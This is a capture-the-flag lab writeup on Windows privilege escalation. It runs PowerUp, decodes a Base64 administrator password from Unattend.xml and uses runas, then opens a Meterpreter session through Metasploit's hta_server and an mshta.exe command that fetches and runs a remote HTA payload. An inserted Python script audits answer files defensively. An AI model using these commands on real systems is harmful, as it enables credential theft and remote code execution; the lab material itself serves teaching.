Unattended Installation
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali machine and a Windows machine.
Your task is to run the PowerUp.ps1 PowerShell script to find a common Windows privilege escalation flaw that depends on misconfigurations. The PowerSploit post-exploitation framework has been provided to you on the Windows machine.
Objective: Gain access to a Meterpreter session with high privileges.
Tools
The best tools for this lab are:
PowerUp.ps1
Metasploit Framework
PowerShell
Writeup
cd .\Desktop\PowerSploit\Privesc\
powershell -ep bypass
. .\PowerUp.ps1
Invoke-PrivescAudit
cat C:\Windows\Panther\Unattend.xml
$password='QWRtaW5AMTIz'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($password))
echo $password
runas.exe /user:administrator cmd
Admin@123
whoami
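From the defender's side, the steps above work because an answer file was left on disk with a password that is only Base64-encoded. The following is an added example, not part of the original writeup: a Python check that reports which password elements in an answer file are still recoverable, without returning the values. The sample XML, its values and the function names are constructed for illustration.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample answer file (not taken from the lab machine).
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>RXhhbXBsZVBhc3M=</Value><PlainText>false</PlainText></Password>
        <Username>administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>*SENSITIVE*DATA*DELETED*</Value><PlainText>false</PlainText></AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>"""

def local(tag):
    """Strip the XML namespace so the check works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]

def audit_unattend(xml_text):
    """Return (element, status) per password element; the secret is never returned."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        name = local(elem.tag)
        if not name.endswith("Password"):
            continue
        fields = {local(c.tag): (c.text or "").strip() for c in elem}
        value = fields.get("Value", "")
        if not value:
            continue
        # Assumption of this example: a missing PlainText flag is treated as plaintext.
        if fields.get("PlainText", "true").lower() == "true":
            status = "plaintext"
        else:
            try:
                base64.b64decode(value, validate=True)
                status = "base64-recoverable"   # encoding only, not encryption
            except ValueError:
                status = "scrubbed-or-unreadable"
        findings.append((name, status))
    return findings

if __name__ == "__main__":
    for name, status in audit_unattend(SAMPLE_UNATTEND):
        print(f"{name}: {status}")
```

Any element reported as `plaintext` or `base64-recoverable` means the file should be deleted or scrubbed and the account's password rotated.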
Persistence
msfconsole -q
use exploit/windows/misc/hta_server
exploit
mshta.exe http://10.10.31.2:8080/Bn75U0NL8ONS.hta
sessions -i 1
cd /
cd C:\\Users\\Administrator\\Desktop
dir
cat flag.txt